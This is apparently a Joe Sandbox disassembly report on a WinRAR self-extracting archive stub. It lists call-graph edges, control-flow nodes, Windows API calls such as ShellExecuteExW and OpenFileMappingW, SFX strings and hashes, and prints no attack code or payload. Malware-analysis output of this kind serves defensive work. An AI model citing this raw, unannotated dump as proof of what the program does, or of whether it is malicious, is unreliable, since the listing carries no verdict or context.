29890->29893 29892 24d771 146 API calls 29891->29892 29894 2455b7 29892->29894 29893->29894 29908 24fd28 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29894->29908 29896 2455f1 29896->29898 29909 2432d2 80 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29896->29909 
29898->29888 29899->29848 29900->29860 29901->29864 29902->29848 29903->29857 29904->29874 29905->29898 29906->29879 29907->29881 29908->29896 29909->29898 29910->29874 29912 260693 GetMessageW 29911->29912 29913 2606cc GetDlgItem 29911->29913 29914 2606b8 TranslateMessage DispatchMessageW 29912->29914 29915 2606a9 IsDialogMessageW 29912->29915 29913->28621 29913->28623 29914->29913 29915->29913 29915->29914 29917 247493 29916->29917 29920 247441 29916->29920 29927 241a92 28 API calls 29917->29927 29924 24744c 29920->29924 29925 2412d3 28 API calls Concurrency::cancel_current_task 29920->29925 29922 247471 29926 2411b8 28 API calls 29922->29926 29924->28629 29925->29922 29926->29924 29929 2568e0 __EH_prolog3_GS 29928->29929 29943 25663b 29929->29943 29934 256929 29941 25696e 29934->29941 29956 256a3d 29934->29956 29959 247ff0 28 API calls 29934->29959 29936 25698e 29940 2569d2 29936->29940 29961 2419a9 26 API calls 29936->29961 29937 265787 5 API calls 29939 2569e8 29937->29939 29939->28277 29940->29937 29941->29936 29960 247ff0 28 API calls 29941->29960 29944 2566df 29943->29944 29945 256651 29943->29945 29947 24adcc 29944->29947 29945->29944 29946 241b63 28 API calls 29945->29946 29946->29945 29948 24ae43 29947->29948 29951 24addd 29947->29951 29964 241a92 28 API calls 29948->29964 29955 24ade8 29951->29955 29962 2412d3 28 API calls Concurrency::cancel_current_task 29951->29962 29953 24ae17 29963 2411b8 28 API calls 29953->29963 29955->29934 29965 24f68d 29956->29965 29959->29934 29960->29936 29961->29940 29962->29953 29963->29955 29966 24f6a4 __vswprintf_c_l 29965->29966 29969 26cee1 29966->29969 29972 26afa4 29969->29972 29973 26afe4 29972->29973 29974 26afcc 29972->29974 29973->29974 29976 26afec 29973->29976 29989 2701d3 20 API calls _abort 29974->29989 29991 26b543 38 API calls 2 library calls 29976->29991 29977 26afd1 29990 26ac8e 26 API calls _abort 29977->29990 29980 26affc 29992 26b50e 20 API calls 2 library calls 29980->29992 29981 265734 
__ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 29983 24f6ae 29981->29983 29983->29934 29984 26b074 29993 26b8f3 51 API calls 4 library calls 29984->29993 29987 26afdc 29987->29981 29988 26b07f 29994 26b5c6 20 API calls _free 29988->29994 29989->29977 29990->29987 29991->29980 29992->29984 29993->29988 29994->29987 29995 264b8a 29996 264b33 29995->29996 29997 264fce ___delayLoadHelper2@8 17 API calls 29996->29997 29997->29996 29998 24e3d5 30004 24e3df 29998->30004 29999 265734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 30000 24e481 29999->30000 30001 24e551 SetFilePointer 30002 24e56e GetLastError 30001->30002 30003 24e403 30001->30003 30002->30003 30003->29999 30004->30001 30004->30003 30005 266452 30006 26645e ___scrt_is_nonwritable_in_current_image 30005->30006 30037 265e63 30006->30037 30008 266465 30009 2665b8 30008->30009 30012 26648f 30008->30012 30140 266878 4 API calls 2 library calls 30009->30140 30011 2665bf 30133 26ee14 30011->30133 30023 2664ce ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 30012->30023 30048 26f9ad 30012->30048 30018 2664ae 30021 26652f 30056 266993 GetStartupInfoW __cftof 30021->30056 30023->30021 30136 26e9b0 38 API calls 2 library calls 30023->30136 30024 266535 30057 26f8fe 51 API calls 30024->30057 30027 26653d 30058 26454a 30027->30058 30031 266551 30031->30011 30032 266555 30031->30032 30033 26655e 30032->30033 30138 26edb7 28 API calls _abort 30032->30138 30139 265fd4 12 API calls ___scrt_uninitialize_crt 30033->30139 30036 266566 30036->30018 30038 265e6c 30037->30038 30142 266694 IsProcessorFeaturePresent 30038->30142 30040 265e78 30143 2696d9 10 API calls 2 library calls 30040->30143 30042 265e7d 30043 265e81 30042->30043 30144 26f837 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 30042->30144 30043->30008 30045 265e8a 30046 265e98 30045->30046 30145 2696f8 7 API calls 2 library calls 
30045->30145 30046->30008 30049 26f9c4 30048->30049 30050 265734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 30049->30050 30051 2664a8 30050->30051 30051->30018 30052 26f951 30051->30052 30053 26f980 30052->30053 30054 265734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 30053->30054 30055 26f9a9 30054->30055 30055->30023 30056->30024 30057->30027 30146 256d7b 30058->30146 30061 251309 30 API calls 30062 264572 30061->30062 30228 25f4d4 30062->30228 30064 26457b __cftof 30232 25f89a 30064->30232 30068 264608 GetCommandLineW 30069 264618 30068->30069 30070 2646f9 30068->30070 30072 2414a7 28 API calls 30069->30072 30071 2513f9 29 API calls 30070->30071 30073 264703 30071->30073 30074 264622 30072->30074 30075 2425a4 26 API calls 30073->30075 30076 2619ee 106 API calls 30074->30076 30077 264710 30075->30077 30078 26462c 30076->30078 30079 241a66 26 API calls 30077->30079 30080 241a66 26 API calls 30078->30080 30081 264719 SetEnvironmentVariableW GetLocalTime 30079->30081 30082 264635 30080->30082 30086 24f6ba _swprintf 51 API calls 30081->30086 30084 264642 OpenFileMappingW 30082->30084 30085 2646dc 30082->30085 30088 2646d2 CloseHandle 30084->30088 30089 26465b MapViewOfFile 30084->30089 30087 2414a7 28 API calls 30085->30087 30090 26477e SetEnvironmentVariableW GetModuleHandleW LoadIconW 30086->30090 30091 2646e6 30087->30091 30088->30070 30089->30088 30092 26466b UnmapViewOfFile MapViewOfFile 30089->30092 30093 2607e5 34 API calls 30090->30093 30094 263efc 30 API calls 30091->30094 30092->30088 30095 264689 30092->30095 30097 2647bc 30093->30097 30098 2646f0 30094->30098 30096 25fc38 28 API calls 30095->30096 30100 264699 30096->30100 30101 253538 124 API calls 30097->30101 30099 241a66 26 API calls 30098->30099 30099->30070 30102 263efc 30 API calls 30100->30102 30103 2647cc 30101->30103 30105 2646a2 30102->30105 30104 25d255 28 API calls 30103->30104 30106 2647d8 30104->30106 30107 255109 105 API calls 30105->30107 
30108 25d255 28 API calls 30106->30108 30109 2646b5 30107->30109 30110 2647e1 DialogBoxParamW 30108->30110 30111 2551bf 105 API calls 30109->30111 30112 25d347 26 API calls 30110->30112 30113 2646c0 30111->30113 30114 26481e 30112->30114 30116 2646cb UnmapViewOfFile 30113->30116 30115 25d347 26 API calls 30114->30115 30117 26482a 30115->30117 30116->30088 30118 264833 Sleep 30117->30118 30119 26483a 30117->30119 30118->30119 30120 264848 30119->30120 30121 25fb4b 48 API calls 30119->30121 30122 264852 DeleteObject 30120->30122 30121->30120 30123 264867 DeleteObject 30122->30123 30124 26486e 30122->30124 30123->30124 30125 2648b0 30124->30125 30126 26489e 30124->30126 30129 25f53a GdiplusShutdown CoUninitialize 30125->30129 30127 263fcf 6 API calls 30126->30127 30128 2648a4 CloseHandle 30127->30128 30128->30125 30130 2648ea 30129->30130 30131 265734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 30130->30131 30132 2648fd 30131->30132 30137 2669c9 GetModuleHandleW 30132->30137 30298 26eb91 30133->30298 30136->30021 30137->30031 30138->30033 30139->30036 30140->30011 30142->30040 30143->30042 30144->30045 30145->30043 30248 265b20 30146->30248 30149 256dd3 GetProcAddress 30152 256de5 30149->30152 30153 256dfd GetProcAddress 30149->30153 30150 256e28 30151 25719b 30150->30151 30279 26e50e 42 API calls __vsnwprintf_l 30150->30279 30156 2513f9 29 API calls 30151->30156 30152->30153 30153->30150 30154 256e0f 30153->30154 30154->30150 30158 2571a6 30156->30158 30157 257098 30157->30151 30160 2513f9 29 API calls 30157->30160 30159 252117 45 API calls 30158->30159 30182 2571ba 30159->30182 30161 2570ac 30160->30161 30162 2570bd CreateFileW 30161->30162 30163 2570ba 30161->30163 30165 257186 CloseHandle 30162->30165 30166 2570db SetFilePointer 30162->30166 30163->30162 30168 241a66 26 API calls 30165->30168 30166->30165 30167 2570ed ReadFile 30166->30167 30167->30165 30169 257109 30167->30169 30170 257199 30168->30170 30172 2573f2 30169->30172 30173 25711a 
30169->30173 30170->30151 30171 2414a7 28 API calls 30171->30182 30285 265ce1 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess IsProcessorFeaturePresent 30172->30285 30175 2414a7 28 API calls 30173->30175 30183 257133 30175->30183 30177 25229d 45 API calls 30177->30182 30178 2573f7 30179 2571de CompareStringW 30179->30182 30180 241a66 26 API calls 30180->30182 30182->30171 30182->30177 30182->30179 30182->30180 30184 24ed1f 49 API calls 30182->30184 30202 257248 30182->30202 30250 25067e 30182->30250 30255 256c5e 30182->30255 30185 257176 30183->30185 30190 256c5e 30 API calls 30183->30190 30280 256366 30183->30280 30184->30182 30189 241a66 26 API calls 30185->30189 30186 257292 30187 2573bd 30186->30187 30188 25729e 30186->30188 30192 241a66 26 API calls 30187->30192 30284 252187 45 API calls 30188->30284 30193 25717e 30189->30193 30190->30183 30196 2573c5 30192->30196 30197 241a66 26 API calls 30193->30197 30194 2414a7 28 API calls 30194->30202 30195 2572a7 30200 25067e 6 API calls 30195->30200 30198 241a66 26 API calls 30196->30198 30197->30165 30201 2573cd 30198->30201 30199 25229d 45 API calls 30199->30202 30203 2572ac 30200->30203 30206 265734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 30201->30206 30202->30186 30202->30194 30202->30199 30207 241a66 26 API calls 30202->30207 30213 24ed1f 49 API calls 30202->30213 30204 2572b3 30203->30204 30205 257332 30203->30205 30208 256c5e 30 API calls 30204->30208 30209 256a25 53 API calls 30205->30209 30210 2573e8 30206->30210 30207->30202 30211 2572bd 30208->30211 30212 25735b AllocConsole 30209->30212 30210->30061 30214 256c5e 30 API calls 30211->30214 30215 257368 GetCurrentProcessId AttachConsole 30212->30215 30227 257310 30212->30227 30213->30202 30216 2572c7 30214->30216 30217 257383 30215->30217 30218 254318 53 API calls 30216->30218 30222 25738c GetStdHandle WriteConsoleW Sleep FreeConsole 30217->30222 30219 2572ec 30218->30219 30221 256a25 53 API 
calls 30219->30221 30220 2573b5 ExitProcess 30223 2572f6 30221->30223 30222->30227 30224 254318 53 API calls 30223->30224 30225 257307 30224->30225 30226 2414a7 28 API calls 30225->30226 30226->30227 30227->30220 30229 256c5e 30 API calls 30228->30229 30230 25f4e8 OleInitialize 30229->30230 30231 25f50b GdiplusStartup SHGetMalloc 30230->30231 30231->30064 30233 2425a4 26 API calls 30232->30233 30234 25f8a8 30233->30234 30235 2425a4 26 API calls 30234->30235 30236 25f8b4 30235->30236 30237 2425a4 26 API calls 30236->30237 30238 25f8c0 30237->30238 30239 2425a4 26 API calls 30238->30239 30240 25f8cc 30239->30240 30241 25f84c 30240->30241 30242 241a66 26 API calls 30241->30242 30243 25f857 30242->30243 30244 241a66 26 API calls 30243->30244 30245 25f85f 30244->30245 30246 241a66 26 API calls 30245->30246 30247 25f867 30246->30247 30249 256d8d GetModuleHandleW 30248->30249 30249->30149 30249->30150 30251 2506a4 GetVersionExW 30250->30251 30252 2506d1 30250->30252 30251->30252 30253 265734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 30252->30253 30254 2506fa 30253->30254 30254->30182 30256 256c6a __EH_prolog3_GS 30255->30256 30257 2656f6 28 API calls 30256->30257 30258 256c77 30257->30258 30259 256c8d GetSystemDirectoryW 30258->30259 30260 256cab 30259->30260 30277 256ca4 30259->30277 30261 2414a7 28 API calls 30260->30261 30262 256ccd 30261->30262 30264 2414a7 28 API calls 30262->30264 30263 256d71 30266 265787 5 API calls 30263->30266 30267 256cda 30264->30267 30265 2412a7 26 API calls 30265->30263 30268 256d78 30266->30268 30286 251ad1 30267->30286 30268->30182 30271 241a66 26 API calls 30272 256cf7 30271->30272 30273 241a66 26 API calls 30272->30273 30274 256cff LoadLibraryW 30273->30274 30276 256d1c 30274->30276 30274->30277 30276->30277 30296 2419a9 26 API calls 30276->30296 30277->30263 30277->30265 30279->30157 30282 256380 30280->30282 30281 2563b7 30281->30183 30282->30281 30283 241b63 28 API calls 30282->30283 30283->30282 30284->30195 
30285->30178 30287 251add __EH_prolog3_GS 30286->30287 30288 247673 28 API calls 30287->30288 30289 251aef 30288->30289 30291 251b0c 30289->30291 30297 250ddb 28 API calls 30289->30297 30292 241a66 26 API calls 30291->30292 30293 251b35 30292->30293 30294 265787 5 API calls 30293->30294 30295 251b3a 30294->30295 30295->30271 30296->30277 30297->30291 30299 26eb9d _unexpected 30298->30299 30300 26ebb6 30299->30300 30301 26eba4 30299->30301 30322 2718e1 EnterCriticalSection 30300->30322 30334 26eceb GetModuleHandleW 30301->30334 30304 26eba9 30304->30300 30335 26ed2f GetModuleHandleExW 30304->30335 30308 26ebbd 30317 26ec5b 30308->30317 30319 26ec32 30308->30319 30343 26f6a0 20 API calls _abort 30308->30343 30310 26eca4 30344 278fc0 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 30310->30344 30311 26ec78 30326 26ecaa 30311->30326 30312 26f951 _abort 5 API calls 30312->30317 30316 26f951 _abort 5 API calls 30321 26ec4a 30316->30321 30323 26ec9b 30317->30323 30319->30316 30319->30321 30321->30312 30322->30308 30345 271931 LeaveCriticalSection 30323->30345 30325 26ec74 30325->30310 30325->30311 30346 271d26 30326->30346 30329 26ecd8 30332 26ed2f _abort 8 API calls 30329->30332 30330 26ecb8 GetPEB 30330->30329 30331 26ecc8 GetCurrentProcess TerminateProcess 30330->30331 30331->30329 30333 26ece0 ExitProcess 30332->30333 30334->30304 30336 26ed7c 30335->30336 30337 26ed59 GetProcAddress 30335->30337 30338 26ed82 FreeLibrary 30336->30338 30339 26ed8b 30336->30339 30340 26ed6e 30337->30340 30338->30339 30341 265734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 30339->30341 30340->30336 30342 26ebb5 30341->30342 30342->30300 30343->30319 30345->30325 30347 271d4b 30346->30347 30349 271d41 30346->30349 30353 271948 5 API calls _unexpected 30347->30353 30350 265734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 30349->30350 30351 26ecb4 30350->30351 30351->30329 30351->30330 30352 271d62 30352->30349 30353->30352 
30354 24e0b0 30355 24e0c9 30354->30355 30358 24e850 102 API calls 30355->30358 30356 24e0cd 30359 24e850 102 API calls 30356->30359 30357 24e0fb 30358->30356 30359->30357 30360 262813 30361 247673 28 API calls 30360->30361 30368 262832 _wcslen 30361->30368 30362 262af7 30434 2458cb 45 API calls 30362->30434 30363 262a9a 30363->30362 30364 247673 28 API calls 30363->30364 30365 262aec 30364->30365 30392 2638a0 30365->30392 30368->30362 30368->30363 30372 24120c 28 API calls 30368->30372 30374 2628fe 30372->30374 30430 25645a 28 API calls 30374->30430 30378 262a01 30386 262a39 30378->30386 30432 2419a9 26 API calls 30378->30432 30381 26292f 30381->30378 30382 24adaa CompareStringW 30381->30382 30389 2414a7 28 API calls 30381->30389 30390 241a66 26 API calls 30381->30390 30431 25645a 28 API calls 30381->30431 30382->30381 30386->30363 30433 2419a9 26 API calls 30386->30433 30389->30381 30390->30381 30399 2638ac __cftof __EH_prolog3_GS 30392->30399 30393 241a66 26 API calls 30394 263bcf 30393->30394 30395 265787 5 API calls 30394->30395 30396 263bd4 30395->30396 30396->30362 30397 263a1e 30398 2414a7 28 API calls 30397->30398 30401 263a34 30398->30401 30399->30397 30414 263ba8 30399->30414 30441 258da4 CompareStringW 30399->30441 30402 24ed0d 49 API calls 30401->30402 30403 263a41 30402->30403 30404 241a66 26 API calls 30403->30404 30405 263a4b 30404->30405 30406 263a9d ShellExecuteExW 30405->30406 30409 2414a7 28 API calls 30405->30409 30407 263ab2 30406->30407 30408 263b7c 30406->30408 30411 263ae5 WaitForInputIdle 30407->30411 30412 263ace IsWindowVisible 30407->30412 30415 263b30 CloseHandle 30407->30415 30408->30414 30444 2419a9 26 API calls 30408->30444 30410 263a71 30409->30410 30442 250e49 51 API calls 2 library calls 30410->30442 30435 263fcf WaitForSingleObject 30411->30435 30412->30411 30416 263ad9 ShowWindow 30412->30416 30414->30393 30420 263b48 30415->30420 30421 263b3d 30415->30421 30416->30411 30418 263a82 30423 241a66 26 API calls 30418->30423 
30420->30408 30427 263b73 ShowWindow 30420->30427 30443 258da4 CompareStringW 30421->30443 30422 263afb 30422->30415 30426 263b08 GetExitCodeProcess 30422->30426 30425 263a8e 30423->30425 30425->30406 30426->30415 30428 263b19 30426->30428 30427->30408 30428->30415 30430->30381 30431->30381 30432->30386 30433->30363 30436 26402f 30435->30436 30437 263fea 30435->30437 30436->30422 30438 263fed PeekMessageW 30437->30438 30439 264020 WaitForSingleObject 30438->30439 30440 263fff GetMessageW TranslateMessage DispatchMessageW 30438->30440 30439->30436 30439->30438 30440->30439 30441->30397 30442->30418 30443->30420 30444->30414 30445 26437d 30446 264389 __EH_prolog3_GS 30445->30446 30447 254318 53 API calls 30446->30447 30448 2643c6 30447->30448 30449 256a25 53 API calls 30448->30449 30450 2643d0 30449->30450 30451 2425a4 26 API calls 30450->30451 30452 2643dc 30451->30452 30453 241a66 26 API calls 30452->30453 30454 2643e4 30453->30454 30455 241de7 SetDlgItemTextW 30454->30455 30456 2643f5 30455->30456 30457 260678 5 API calls 30456->30457 30458 2643fa 30457->30458 30462 264430 30458->30462 30463 2419a9 26 API calls 30458->30463 30459 265787 5 API calls 30460 264446 30459->30460 30462->30459 30463->30462

Control-flow Graph

control_flow_graph 383 26454a-264612 call 256d7b call 251309 call 25f4d4 call 2671f0 call 25f89a call 25f84c GetCommandLineW 396 264618-26463c call 2414a7 call 2619ee call 241a66 383->396 397 2646f9-264722 call 2513f9 call 2425a4 call 241a66 383->397 412 264642-264659 OpenFileMappingW 396->412 413 2646dc-2646eb call 2414a7 call 263efc 396->413 410 264724 397->410 411 264729-264831 SetEnvironmentVariableW GetLocalTime call 24f6ba SetEnvironmentVariableW GetModuleHandleW LoadIconW call 2607e5 call 253538 call 25d255 * 2 DialogBoxParamW call 25d347 * 2 397->411 410->411 447 264833-264834 Sleep 411->447 448 26483a-264841 411->448 416 2646d2-2646da CloseHandle 412->416 417 26465b-264669 MapViewOfFile 412->417 426 2646f0-2646f4 call 241a66 413->426 416->397 417->416 420 26466b-264687 UnmapViewOfFile MapViewOfFile 417->420 420->416 423 264689-2646cc call 25fc38 call 263efc call 255109 call 2551bf call 2551f8 UnmapViewOfFile 420->423 423->416 426->397 447->448 449 264843 call 25fb4b 448->449 450 264848-264865 call 255041 DeleteObject 448->450 449->450 454 264867-264868 DeleteObject 450->454 455 26486e-264874 450->455 454->455 456 264876-26487d 455->456 457 26488e-26489c 455->457 456->457 458 26487f-264889 call 2494b8 456->458 459 2648b0-2648bd 457->459 460 26489e-2648aa call 263fcf CloseHandle 457->460 458->457 463 2648e1-2648e5 call 25f53a 459->463 464 2648bf-2648cb 459->464 460->459 469 2648ea-264903 call 265734 463->469 466 2648cd-2648d5 464->466 467 2648db-2648dd 464->467 466->463 470 2648d7-2648d9 466->470 467->463 471 2648df 467->471 470->463 471->463

APIs
  • Part of subcall function 00256D7B: GetModuleHandleW.KERNEL32(kernel32,6294DA82), ref: 00256DC7
  • Part of subcall function 00256D7B: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00256DD9
  • Part of subcall function 00256D7B: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00256E03
  • Part of subcall function 00251309: __EH_prolog3.LIBCMT ref: 00251310
  • Part of subcall function 00251309: GetCurrentDirectoryW.KERNEL32(00000000,00000000,0000000C,002517FB,?,?,\\?\,6294DA82,?,?,?,00000000,0027A279,000000FF), ref: 00251319
  • Part of subcall function 0025F4D4: OleInitialize.OLE32(00000000), ref: 0025F4ED
  • Part of subcall function 0025F4D4: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0025F524
  • Part of subcall function 0025F4D4: SHGetMalloc.SHELL32(0029532C), ref: 0025F52E
• GetCommandLineW.KERNEL32 ref: 00264608
• OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp,?,00000000), ref: 0026464F
• MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000009,?,00000000), ref: 00264661
• UnmapViewOfFile.KERNEL32(00000000,?,00000000), ref: 0026466F
• MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,?,?,00000000), ref: 0026467D
  • Part of subcall function 0025FC38: __EH_prolog3.LIBCMT ref: 0025FC3F
  • Part of subcall function 00263EFC: __EH_prolog3_GS.LIBCMT ref: 00263F03
  • Part of subcall function 00263EFC: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?,?,?,?,?,?,00000028), ref: 00263F1B
  • Part of subcall function 00263EFC: SetEnvironmentVariableW.KERNEL32(sfxpar,?,?,?,?,?,?,?,00000028), ref: 00263F86
  • Part of subcall function 002551BF: _wcslen.LIBCMT ref: 002551E3
• UnmapViewOfFile.KERNEL32(00000000,00295430,00000400,00295430,00295430,00000400,00000000,00000001,?,00000000), ref: 002646CC
• CloseHandle.KERNEL32(00000000,?,00000000), ref: 002646D3
• SetEnvironmentVariableW.KERNEL32(sfxname,00289698,00000000), ref: 0026472F
• GetLocalTime.KERNEL32(?), ref: 0026473A
• _swprintf.LIBCMT ref: 00264779
• SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0026478E
• GetModuleHandleW.KERNEL32(00000000), ref: 00264795
• LoadIconW.USER32(00000000,00000064), ref: 002647AC
• DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_00020900,00000000), ref: 00264803
• Sleep.KERNELBASE(00001B58), ref: 00264834
• DeleteObject.GDI32 ref: 00264858
• DeleteObject.GDI32(13050D28), ref: 00264868
  • Part of subcall function 002414A7: _wcslen.LIBCMT ref: 002414B8
  • Part of subcall function 002619EE: __EH_prolog3_GS.LIBCMT ref: 002619F5
• CloseHandle.KERNEL32 ref: 002648AA

Strings

Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp

Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd

Similarity
• API ID: File$EnvironmentHandleVariableView$AddressCloseDeleteH_prolog3H_prolog3_ModuleObjectProcUnmap_wcslen$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingOpenParamSleepStartupTime_swprintf
• String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$0T)$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
• API String ID: 3142445277-456881295
• Opcode ID: 7ea8b135c238997765a928555e1e6f339c38b2d9f0151ebe41c94d76a4555f7b
• Instruction ID: e43b6d04ef96ad0e2b19e95fa47e7e6ccdea77e4edef4cfed0336fb50d133656
• Opcode Fuzzy Hash: 7ea8b135c238997765a928555e1e6f339c38b2d9f0151ebe41c94d76a4555f7b
• Instruction Fuzzy Hash: D091D171624350AFD321BF70EC49B6B77ECAB49701F40082EF98993191EB7498A4CF65

Control-flow Graph

control_flow_graph 737 25ebd3-25ebf0 FindResourceW 738 25ebf6-25ec07 SizeofResource 737->738 739 25ecec 737->739 738->739 741 25ec0d-25ec1c LoadResource 738->741 740 25ecee-25ecf2 739->740 741->739 742 25ec22-25ec2d LockResource 741->742 742->739 743 25ec33-25ec48 GlobalAlloc 742->743 744 25ece4-25ecea 743->744 745 25ec4e-25ec57 GlobalLock 743->745 744->740 746 25ecdd-25ecde GlobalFree 745->746 747 25ec5d-25ec7b call 266c70 CreateStreamOnHGlobal 745->747 746->744 750 25ecd6-25ecd7 GlobalUnlock 747->750 751 25ec7d-25ec9f call 25eb06 747->751 750->746 751->750 756 25eca1-25eca9 751->756 757 25ecc4-25ecd2 756->757 758 25ecab-25ecbf GdipCreateHBITMAPFromBitmap 756->758 757->750 758->757 759 25ecc1 758->759 759->757

APIs
• FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00260845,00000066), ref: 0025EBE6
• SizeofResource.KERNEL32(00000000,?,?,?,00260845,00000066), ref: 0025EBFD
• LoadResource.KERNEL32(00000000,?,?,?,00260845,00000066), ref: 0025EC14
• LockResource.KERNEL32(00000000,?,?,?,00260845,00000066), ref: 0025EC23
• GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00260845,00000066), ref: 0025EC3E
• GlobalLock.KERNEL32(00000000), ref: 0025EC4F
• CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0025EC73
• GlobalUnlock.KERNEL32(00000000), ref: 0025ECD7
  • Part of subcall function 0025EB06: GdipAlloc.GDIPLUS(00000010), ref: 0025EB0C
• GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0025ECB8
• GlobalFree.KERNEL32(00000000), ref: 0025ECDE

Strings

Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp

Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd

Similarity
• API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
• String ID: PNG
• API String ID: 211097158-364855578
                                                                                                                                                                            • Opcode ID: c0684f626b4d14632a15b5796107c3be16b4beb5f6c246b8557f9cc6ced270e4
                                                                                                                                                                            • Instruction ID: 9d3e5cfbc140815b70dc4d773789a51732cf01740c610015559c5e1cc69eda5f
                                                                                                                                                                            • Opcode Fuzzy Hash: c0684f626b4d14632a15b5796107c3be16b4beb5f6c246b8557f9cc6ced270e4
                                                                                                                                                                            • Instruction Fuzzy Hash: 25319E71210212ABDB15AF31ED4CD2B7FACFF45752B11052AFC09D2261EB31D954CBA4
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00258781: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,6294DA82,00000007,?,?,?,00258751,?,?,?,?,0000000C,00244426), ref: 0025879D
                                                                                                                                                                            • _wcslen.LIBCMT ref: 0025395A
                                                                                                                                                                            • __fprintf_l.LIBCMT ref: 00253AA7
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ByteCharMultiWide__fprintf_l_wcslen
                                                                                                                                                                            • String ID: ,$$%s:$*messages***$*messages***$@%s:$RTL
                                                                                                                                                                            • API String ID: 1796436225-285229759
                                                                                                                                                                            • Opcode ID: 90513545f0f5174151f62756699fc8ba1d0a903d61adae6ffab00b01f77037d5
                                                                                                                                                                            • Instruction ID: a93c06acaeeec571d686edda0712bd253083474603e0bdc4b2dc7385e3d417b1
                                                                                                                                                                            • Opcode Fuzzy Hash: 90513545f0f5174151f62756699fc8ba1d0a903d61adae6ffab00b01f77037d5
                                                                                                                                                                            • Instruction Fuzzy Hash: 4052E571E20249AFDF24DFA8C885AEDB7B4FF04351F50152AEC05EB281E7719A68CB54

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
